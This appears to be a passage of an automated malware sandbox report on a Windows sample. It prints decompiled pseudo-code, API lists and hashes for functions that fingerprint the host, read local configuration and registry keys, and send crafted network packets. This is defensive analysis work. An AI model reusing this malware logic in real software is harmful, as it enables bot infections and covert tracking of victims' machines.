                                                                                0x0040e6b7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040e66e
                                                                                0x0040e66e
                                                                                0x0040e66e
                                                                                0x0040e676
                                                                                0x0040e684
                                                                                0x0040e68f
                                                                                0x0040e699
                                                                                0x0040e686
                                                                                0x0040e686
                                                                                0x0040e686
                                                                                0x0040e69b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040e69b
                                                                                0x0040e69d
                                                                                0x0040e69d
                                                                                0x0040e69f
                                                                                0x0040e6a1
                                                                                0x0040e6a7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                  • Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
                                                                                  • Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
                                                                                  • Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53
                                                                                • lstrcmpA.KERNEL32(74CB43E8,00000000,?,74CB43E0,00000000,?,00405EC1), ref: 0040E693
                                                                                • lstrcpynA.KERNEL32(00000008,00000000,0000000F,?,74CB43E0,00000000,?,00405EC1), ref: 0040E6E9
                                                                                • lstrcmpA.KERNEL32(?,00000008,?,74CB43E0,00000000,?,00405EC1), ref: 0040E722
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcmp$CountCurrentExchangeInterlockedThreadTicklstrcpyn
                                                                                • String ID: A$ A
                                                                                • API String ID: 3343386518-686259309
                                                                                • Opcode ID: 951ece8c2afd944643beef7ac70d50e077dd33d1a65e809f7a70b3905a3fc363
                                                                                • Instruction ID: 47b803fc1c440cad9c550ff35358ad860d5bc2ca4051ff98ce99c32b6473ed9c
                                                                                • Opcode Fuzzy Hash: 951ece8c2afd944643beef7ac70d50e077dd33d1a65e809f7a70b3905a3fc363
                                                                                • Instruction Fuzzy Hash: CC31C031600301DBCB318F66E8847977BE4AB24314F508D3BE555A7690D779E8A0CB89
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004026FF Relevance: 7.6, APIs: 5, Instructions: 96networkCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 26%
                                                                                			E004026FF(intOrPtr* __eax, intOrPtr _a4, intOrPtr _a8, long _a12) {
				long* _t33;
				long _t35;
				long* _t36;
				long _t37;
				long _t38;
				short _t39;
				short _t40;
				char _t42;
				intOrPtr _t43;
				void* _t48;
				long* _t49;
				long* _t51;
				long* _t52;
				long* _t53;
				long* _t54;
				void* _t55;
				long* _t56;
				long* _t57;
				long* _t60;
				intOrPtr* _t63;
				intOrPtr* _t65;
				void* _t66;

				_t65 = __eax;
				_t33 =  *0x412bf8; // 0x0
				_t42 = 0;
				if(_t33 == 0) {
					_t33 = E0040EBCC(0x400);
					_pop(_t48);
					 *0x412bf8 = _t33;
				}
				E0040EE2A(_t48, _t33, _t42, 0x400);
				_t35 = GetTickCount();
				_t49 =  *0x412bf8; // 0x0
				_t63 = __imp__#9;
				 *_t49 = _t35;
				_t36 =  *0x412bf8; // 0x0
				_t36[0] = _a12;
				_t37 =  *_t63(1);
				_t51 =  *0x412bf8; // 0x0
				_t51[1] = _t37;
				_t52 =  *0x412bf8; // 0x0
				_t38 = 0;
				_t52[1] = 0;
				_t53 =  *0x412bf8; // 0x0
				_t53[2] = 0;
				_t54 =  *0x412bf8; // 0x0
				_t54[2] = 0;
				_t60 =  *0x412bf8; // 0x0
				_t55 = 0;
				if( *_t65 != _t42) {
					do {
						_t43 =  *((intOrPtr*)(_t38 + _t65));
						_a12 = _t38;
						while(_t43 != 0) {
							if(_t43 != 0x2e) {
								_a12 = _a12 + 1;
								_t43 =  *((intOrPtr*)(_a12 + _t65));
								continue;
							}
							break;
						}
						 *((char*)(_t55 +  &(_t60[3]))) = _a12 - _t38;
						_t55 = _t55 + 1;
						while(_t38 < _a12) {
							 *((char*)(_t55 +  &(_t60[3]))) =  *((intOrPtr*)(_t38 + _t65));
							_t55 = _t55 + 1;
							_t38 = _t38 + 1;
						}
						if( *((char*)(_t38 + _t65)) == 0x2e) {
							_t38 = _t38 + 1;
						}
						_t42 = 0;
					} while ( *((intOrPtr*)(_t38 + _t65)) != 0);
				}
				 *((char*)(_t55 +  &(_t60[3]))) = _t42;
				_t24 = _t55 + 0xd; // 0xf
				_t66 = _t24;
				_t39 =  *_t63(0xf);
				_t56 =  *0x412bf8; // 0x0
				 *((short*)(_t56 + _t66)) = _t39;
				_t40 =  *_t63(1);
				_t57 =  *0x412bf8; // 0x0
				 *((short*)(_t57 + _t66 + 2)) = _t40;
				__imp__#20(_a4, 0x412bf8, _t66 + 4, _t42, _a8, 0x10);
				return 0 | _t40 <= 0x00000000;
			}

























                                                                                0x00402704
                                                                                0x00402706
                                                                                0x0040270b
                                                                                0x00402715
                                                                                0x00402718
                                                                                0x0040271d
                                                                                0x0040271e
                                                                                0x0040271e
                                                                                0x00402726
                                                                                0x0040272e
                                                                                0x00402734
                                                                                0x0040273a
                                                                                0x00402740
                                                                                0x00402743
                                                                                0x0040274e
                                                                                0x00402752
                                                                                0x00402754
                                                                                0x0040275a
                                                                                0x0040275e
                                                                                0x00402764
                                                                                0x00402766
                                                                                0x0040276a
                                                                                0x00402770
                                                                                0x00402774
                                                                                0x0040277a
                                                                                0x0040277e
                                                                                0x00402784
                                                                                0x00402788
                                                                                0x0040278a
                                                                                0x0040278a
                                                                                0x0040278d
                                                                                0x004027a0
                                                                                0x00402795
                                                                                0x00402797
                                                                                0x0040279d
                                                                                0x00000000
                                                                                0x0040279d
                                                                                0x00000000
                                                                                0x00402795
                                                                                0x004027a9
                                                                                0x004027ad
                                                                                0x004027b9
                                                                                0x004027b3
                                                                                0x004027b7
                                                                                0x004027b8
                                                                                0x004027b8
                                                                                0x004027c2
                                                                                0x004027c4
                                                                                0x004027c4
                                                                                0x004027c5
                                                                                0x004027c7
                                                                                0x0040278a
                                                                                0x004027ce
                                                                                0x004027d2
                                                                                0x004027d2
                                                                                0x004027d5
                                                                                0x004027d7
                                                                                0x004027df
                                                                                0x004027e3
                                                                                0x004027e5
                                                                                0x004027f0
                                                                                0x00402802
                                                                                0x00402815

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0040272E
                                                                                • htons.WS2_32(00000001), ref: 00402752
                                                                                • htons.WS2_32(0000000F), ref: 004027D5
                                                                                • htons.WS2_32(00000001), ref: 004027E3
                                                                                • sendto.WS2_32(?,00412BF8,00000009,00000000,00000010,00000010), ref: 00402802
                                                                                  • Part of subcall function 0040EBCC: GetProcessHeap.KERNEL32(00000000,00000000,80000001,0040EBFE,7FFF0001,?,0040DB55,7FFF0001), ref: 0040EBD3
                                                                                  • Part of subcall function 0040EBCC: RtlAllocateHeap.NTDLL(00000000,?,0040DB55,7FFF0001), ref: 0040EBDA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: htons$Heap$AllocateCountProcessTicksendto
                                                                                • String ID:
                                                                                • API String ID: 1128258776-0
                                                                                • Opcode ID: 6299894b8f3bc0cc0dfae645a3d09159b09bee40e3d6069153e68f679ff52250
                                                                                • Instruction ID: e317574a351225f02cdc10e669db3389ba019fd1a924c3d0ab3f78f3d9a30560
                                                                                • Opcode Fuzzy Hash: 6299894b8f3bc0cc0dfae645a3d09159b09bee40e3d6069153e68f679ff52250
                                                                                • Instruction Fuzzy Hash: B8313A342483969FD7108F74DD80AA27760FF19318B19C07EE855DB3A2D6B6E892D718
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040F26D Relevance: 7.6, APIs: 5, Instructions: 63COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • setsockopt.WS2_32(00000000,0000FFFF,00000004,00000000,00000004), ref: 0040F2A0
                                                                                • setsockopt.WS2_32(00000004,0000FFFF,00001005,00000004,00000004), ref: 0040F2C0
                                                                                • setsockopt.WS2_32(00000004,0000FFFF,00001006,00000004,00000004), ref: 0040F2DD
                                                                                • setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 0040F2EC
                                                                                • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 0040F2FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: setsockopt
                                                                                • String ID:
                                                                                • API String ID: 3981526788-0
                                                                                • Opcode ID: 8b4be0266ee07c3102769aa2bfb0f3fbe40b153d7f42fbd5c93fb3948aedae23
                                                                                • Instruction ID: 54276ff97121d9260d4f5268cf3942b14174050ddbce03adff589c8218e6c2bb
                                                                                • Opcode Fuzzy Hash: 8b4be0266ee07c3102769aa2bfb0f3fbe40b153d7f42fbd5c93fb3948aedae23
                                                                                • Instruction Fuzzy Hash: 6B110AB2A40248BAEF11DF94CD85FDE7FBCEB44751F008066BB04EA1D0E6B19A44CB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402419 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00402419(void* __ecx, CHAR* _a4, intOrPtr _a8, CHAR* _a12) {
				int _v8;
				int _t18;
				intOrPtr _t20;
				CHAR* _t21;
				int _t30;
				CHAR* _t36;

				_t18 = lstrlenA(_a12);
				_t36 = _a4;
				_v8 = _t18;
				_t20 = _a8 + _t36;
				_a8 = _t20;
				if(_t36 >= _t20) {
					L5:
					_t21 = 0;
				} else {
					while(1) {
						_t30 = lstrlenA(_t36);
						_t7 =  &(_t36[1]); // 0x1
						_a4 = _t30 + _t7;
						if(_v8 == _t30 && lstrcmpiA(_t36, _a12) == 0 && _a4 < _a8) {
							break;
						}
						_t36 =  &(_t36[lstrlenA(_a4) + _t30 + 2]);
						if(_t36 < _a8) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t21 = _a4;
				}
				L6:
				return _t21;
			}









                                                                                0x00402429
                                                                                0x0040242b
                                                                                0x0040242e
                                                                                0x00402434
                                                                                0x00402436
                                                                                0x0040243b
                                                                                0x00402474
                                                                                0x00402474
                                                                                0x0040243d
                                                                                0x0040243d
                                                                                0x00402440
                                                                                0x00402442
                                                                                0x00402446
                                                                                0x0040244c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040246b
                                                                                0x00402472
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402472
                                                                                0x0040247b
                                                                                0x0040247b
                                                                                0x00402476
                                                                                0x0040247a

                                                                                APIs
                                                                                • lstrlenA.KERNEL32(?,localcfg,?,00000000,?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001), ref: 00402429
                                                                                • lstrlenA.KERNEL32(?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg,lid_file_upd), ref: 0040243E
                                                                                • lstrcmpiA.KERNEL32(?,?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg), ref: 00402452
                                                                                • lstrlenA.KERNEL32(?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg,lid_file_upd), ref: 00402467
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen$lstrcmpi
                                                                                • String ID: localcfg
                                                                                • API String ID: 1808961391-1857712256
                                                                                • Opcode ID: e0652b8e6b882c26303073c97bc729d70adad1496f82cefeb83b9b40d862f6ea
                                                                                • Instruction ID: 10b525c6ae3f8891cd48fd25e34f392daf9ed257baad57177c8ccf48abf1fcea
                                                                                • Opcode Fuzzy Hash: e0652b8e6b882c26303073c97bc729d70adad1496f82cefeb83b9b40d862f6ea
                                                                                • Instruction Fuzzy Hash: B4011A31600218EFCF11EF69DD888DE7BA9EF44354B01C436E859A7250E3B4EA408A98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040E52E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 111fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 92%
                                                                                			E0040E52E(void* __edx, void* __eflags) {
				long _v4;
				void* __ecx;
				void* _t9;
				void* _t11;
				void* _t17;
				long _t20;
				void* _t23;
				int _t24;
				void* _t28;
				void* _t32;
				void* _t37;
				void* _t40;
				void* _t44;

				_t44 = __eflags;
				_t32 = __edx;
				E0040DD05();
				_t28 = E0040DBCF(_t44, 0x80000000, 3);
				_pop(_t31);
				if(_t28 == 0xffffffff) {
					L6:
					_t9 = E00402544(0x4128f8, 0x4110d0, 7, 0xe4, 0xc8);
					_t11 = E0040E3CA(_t32, 0x80000001, E00402544(0x4122f8, 0x4110bc, 0x14, 0xe4, 0xc8), _t9);
					_t40 = _t37 + 0x34;
					if(_t11 == 0) {
						_t17 = E00402544(0x4128f8, 0x4110d0, 7, 0xe4, 0xc8);
						E0040E3CA(_t32, 0x80000001, E00402544(0x4122f8, 0x4110a0, 0x19, 0xe4, 0xc8), _t17);
						_t40 = _t40 + 0x34;
					}
					E0040EE2A(_t31, 0x4122f8, 0, 0x100);
					E0040EE2A(_t31, 0x4128f8, 0, 0x100);
					E0040DD69();
					return 1;
				}
				_t20 = GetFileSize(_t28, 0);
				_v4 = _t20;
				if(_t20 != 0) {
					E0040DB2E(_t20);
					_t23 =  *0x4136c4;
					_pop(_t31);
					if(_t23 != 0) {
						_t31 =  &_v4;
						_t24 = ReadFile(_t28, _t23, _v4,  &_v4, 0);
						_t48 = _t24;
						if(_t24 != 0) {
							E00402544( *0x4136c4,  *0x4136c4, _v4, 0xe4, 0xc8);
							E0040E332(_t32, _t48,  *0x4136c4, _v4);
							_t37 = _t37 + 0x1c;
						}
					}
				}
				CloseHandle(_t28);
				goto L6;
			}
















                                                                                0x0040e52e
                                                                                0x0040e52e
                                                                                0x0040e533
                                                                                0x0040e544
                                                                                0x0040e54c
                                                                                0x0040e553
                                                                                0x0040e5b8
                                                                                0x0040e5c7
                                                                                0x0040e5ed
                                                                                0x0040e5f2
                                                                                0x0040e5f7
                                                                                0x0040e603
                                                                                0x0040e624
                                                                                0x0040e629
                                                                                0x0040e629
                                                                                0x0040e635
                                                                                0x0040e63e
                                                                                0x0040e646
                                                                                0x0040e653
                                                                                0x0040e653
                                                                                0x0040e558
                                                                                0x0040e55e
                                                                                0x0040e564
                                                                                0x0040e567
                                                                                0x0040e56c
                                                                                0x0040e571
                                                                                0x0040e574
                                                                                0x0040e578
                                                                                0x0040e583
                                                                                0x0040e589
                                                                                0x0040e58b
                                                                                0x0040e59a
                                                                                0x0040e5a9
                                                                                0x0040e5ae
                                                                                0x0040e5ae
                                                                                0x0040e58b
                                                                                0x0040e574
                                                                                0x0040e5b2
                                                                                0x00000000

                                                                                APIs
                                                                                  • Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
                                                                                  • Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
                                                                                  • Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,74CB43E0,?,00000000,?,0040A445), ref: 0040E558
                                                                                • ReadFile.KERNEL32(00000000,?,00000000,?,00000000,?,74CB43E0,?,00000000,?,0040A445), ref: 0040E583
                                                                                • CloseHandle.KERNEL32(00000000,?,74CB43E0,?,00000000,?,0040A445), ref: 0040E5B2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCountCurrentExchangeHandleInterlockedReadSizeThreadTick
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 3683885500-2980165447
                                                                                • Opcode ID: ea61079883e1d137724bdb03d89989e3cb326a6ab799ec698869bd57d3053e24
                                                                                • Instruction ID: 336cca8f28a0ae06816d6806ca3c094c6326420f96deeb8fe64773c8e7208e17
                                                                                • Opcode Fuzzy Hash: ea61079883e1d137724bdb03d89989e3cb326a6ab799ec698869bd57d3053e24
                                                                                • Instruction Fuzzy Hash: F321EAB19402047AE2207B639C0AFAB3D1CDF54758F10093EBA09B11E3E9BDD96082BD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0208E795 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 111fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0208DF6C: GetCurrentThreadId.KERNEL32 ref: 0208DFBA
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00410170,?,00000000,?,0208A6AC), ref: 0208E7BF
                                                                                • ReadFile.KERNEL32(00000000,004136C4,00000000,?,00000000,?,00410170,?,00000000,?,0208A6AC), ref: 0208E7EA
                                                                                • CloseHandle.KERNEL32(00000000,?,00410170,?,00000000,?,0208A6AC), ref: 0208E819
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCurrentHandleReadSizeThread
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 1396056608-2980165447
                                                                                • Opcode ID: 7902eb09b18f90ff15814c2c52a49d831fada2081c22b3094fea9a8900fad251
                                                                                • Instruction ID: 1846aee8e1ad59ae9c0d8563558433b7be7f2c056bde8e2a84dd5e9bb428c570
                                                                                • Opcode Fuzzy Hash: 7902eb09b18f90ff15814c2c52a49d831fada2081c22b3094fea9a8900fad251
                                                                                • Instruction Fuzzy Hash: B821E5B1A403007EE2217B319C09FEF3E5DDB65B60F100124FA8EA55D3EAA59450AAB5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401AC3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 74libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 64%
                                                                                			E00401AC3() {
				signed int _v8;
				char _v12;
				signed int _v16;
				struct HINSTANCE__* _t19;
				intOrPtr _t24;
				intOrPtr _t26;
				intOrPtr* _t28;
				signed int _t39;
				void* _t41;
				intOrPtr _t43;

				_v16 = 0;
				_t19 = LoadLibraryA("Iphlpapi.dll");
				if(_t19 == 0) {
					L15:
					return _v16;
				}
				_t28 = GetProcAddress(_t19, "GetAdaptersAddresses");
				if(_t28 == 0) {
					L14:
					goto L15;
				}
				_push( &_v12);
				_v8 = 0;
				_v12 = 0;
				_push(0);
				while(1) {
					_t41 =  *_t28(2, 0, 0);
					if(_t41 != 0x6f) {
						break;
					}
					_t24 = E0040EBED(_v8, _v12);
					if(_t24 == 0) {
						break;
					}
					_push( &_v12);
					_v8 = _t24;
					_push(_t24);
				}
				if(_t41 != 0) {
					L11:
					if(_v8 != 0) {
						E0040EC2E(_v8);
					}
					L13:
					goto L14;
				}
				_t26 = _v8;
				if(_t26 == 0) {
					goto L13;
				} else {
					goto L8;
				}
				do {
					L8:
					_t43 =  *((intOrPtr*)(_t26 + 0x34));
					_t39 = 0;
					if(_t43 <= 0) {
						goto L10;
					} else {
						goto L9;
					}
					do {
						L9:
						_v16 = _v16 ^ ( *(_t26 + _t39 + 0x2c) & 0x000000ff) << (_t39 & 0x00000003) << 0x00000003;
						_t39 = _t39 + 1;
					} while (_t39 < _t43);
					L10:
					_t26 =  *((intOrPtr*)(_t26 + 8));
				} while (_t26 != 0);
				goto L11;
			}













                                                                                0x00401ad1
                                                                                0x00401ad4
                                                                                0x00401adc
                                                                                0x00401b6b
                                                                                0x00401b70
                                                                                0x00401b70
                                                                                0x00401aef
                                                                                0x00401af3
                                                                                0x00401b6a
                                                                                0x00000000
                                                                                0x00401b6a
                                                                                0x00401af9
                                                                                0x00401afa
                                                                                0x00401afd
                                                                                0x00401b00
                                                                                0x00401b1c
                                                                                0x00401b22
                                                                                0x00401b27
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401b09
                                                                                0x00401b12
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401b17
                                                                                0x00401b18
                                                                                0x00401b1b
                                                                                0x00401b1b
                                                                                0x00401b2b
                                                                                0x00401b5b
                                                                                0x00401b5e
                                                                                0x00401b63
                                                                                0x00401b68
                                                                                0x00401b69
                                                                                0x00000000
                                                                                0x00401b69
                                                                                0x00401b2d
                                                                                0x00401b32
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401b34
                                                                                0x00401b34
                                                                                0x00401b34
                                                                                0x00401b37
                                                                                0x00401b3b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401b3d
                                                                                0x00401b3d
                                                                                0x00401b4c
                                                                                0x00401b4f
                                                                                0x00401b50
                                                                                0x00401b54
                                                                                0x00401b54
                                                                                0x00401b57
                                                                                0x00000000

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
                                                                                • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetAdaptersAddresses$Iphlpapi.dll
                                                                                • API String ID: 2574300362-1087626847
                                                                                • Opcode ID: 4ad453f95e319ae71f8ebabcc46d8d27ffdc7fe226df516f9f2c7e6519cf6946
                                                                                • Instruction ID: f6c238f91e07a5798e813b0b618c72a9a5addbcd8e0b61e0281ff71d4ef1483f
                                                                                • Opcode Fuzzy Hash: 4ad453f95e319ae71f8ebabcc46d8d27ffdc7fe226df516f9f2c7e6519cf6946
                                                                                • Instruction Fuzzy Hash: 3D11DA71E01124BFCB11DBA5DD858EEBBB9EB44B10B144077E005F72A1E7786E80CB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02087665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,00000000,00020119,?), ref: 020876D9
                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 0208796D
                                                                                • RegCloseKey.ADVAPI32(?), ref: 0208797E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseEnumOpen
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 1332880857-2980165447
                                                                                • Opcode ID: 6add54f53aa26b9129486f5997ff6e8fcd40a3645fc937a9d882d7137db5ef12
                                                                                • Instruction ID: 3aa7920e38aeb8f5dc3b253b6c4c272fcea1656b35d38f6cf5b03703f271298b
                                                                                • Opcode Fuzzy Hash: 6add54f53aa26b9129486f5997ff6e8fcd40a3645fc937a9d882d7137db5ef12
                                                                                • Instruction Fuzzy Hash: 8611DC70A00209AFDB12AFA9DC44FEFBFB9EB91314F240161F551E62A4E3B08950DB60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401BDF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 76%
                                                                                			E00401BDF() {
				long _v8;
				long _v12;
				void* _v27;
				char _v28;
				void* _t14;
				signed int _t21;
				signed int _t30;
				void* _t31;

				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t30 = 0;
				_v12 = 0;
				asm("stosb");
				_v8 = 0xf;
				_t14 = E00401AC3();
				if(_t14 == 0) {
					if(GetComputerNameA( &_v28,  &_v8) == 0) {
						L6:
						GetVolumeInformationA(0, 0, 4,  &_v12, 0, 0, 0, 0);
						return _v12;
					}
					_t21 = 0;
					if(_v8 <= 0) {
						goto L6;
					} else {
						goto L3;
					}
					do {
						L3:
						_t30 = _t30 ^  *(_t31 + _t21 - 0x18) << (_t21 & 0x00000003) << 0x00000003;
						_t21 = _t21 + 1;
					} while (_t21 < _v8);
					if(_t30 == 0) {
						goto L6;
					}
					return _t30;
				}
				return _t14;
			}











                                                                                0x00401bec
                                                                                0x00401bf2
                                                                                0x00401bf3
                                                                                0x00401bf4
                                                                                0x00401bf5
                                                                                0x00401bf7
                                                                                0x00401bf9
                                                                                0x00401bfc
                                                                                0x00401bfd
                                                                                0x00401c04
                                                                                0x00401c0b
                                                                                0x00401c1d
                                                                                0x00401c45
                                                                                0x00401c51
                                                                                0x00000000
                                                                                0x00401c57
                                                                                0x00401c1f
                                                                                0x00401c24
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401c26
                                                                                0x00401c26
                                                                                0x00401c35
                                                                                0x00401c37
                                                                                0x00401c38
                                                                                0x00401c3f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401c41
                                                                                0x00401c5e

                                                                                APIs
                                                                                  • Part of subcall function 00401AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
                                                                                  • Part of subcall function 00401AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9
                                                                                • GetComputerNameA.KERNEL32(?,0000000F), ref: 00401C15
                                                                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000001), ref: 00401C51
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressComputerInformationLibraryLoadNameProcVolume
                                                                                • String ID: hi_id$localcfg
                                                                                • API String ID: 2777991786-2393279970
                                                                                • Opcode ID: 8706900559274ba91d770fb8bb1d60ecae66f9331a84d665d36368a2f022e804
                                                                                • Instruction ID: b3a67a5cb4ed68e183e77afdc8505cc80d304e276af6d439446d09174096bcc5
                                                                                • Opcode Fuzzy Hash: 8706900559274ba91d770fb8bb1d60ecae66f9331a84d665d36368a2f022e804
                                                                                • Instruction Fuzzy Hash: B2018072A44118BBEB10EAE8C8C59EFBABCAB48745F104476E602F3290D274DE4486A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004096FF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 88%
                                                                                			E004096FF(void* __ecx) {
				void* _v8;
				char* _t6;
				char* _t10;
				void* _t23;
				void* _t24;

				_t16 = __ecx;
				_push(__ecx);
				_t6 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
				_t24 = _t23 + 0x14;
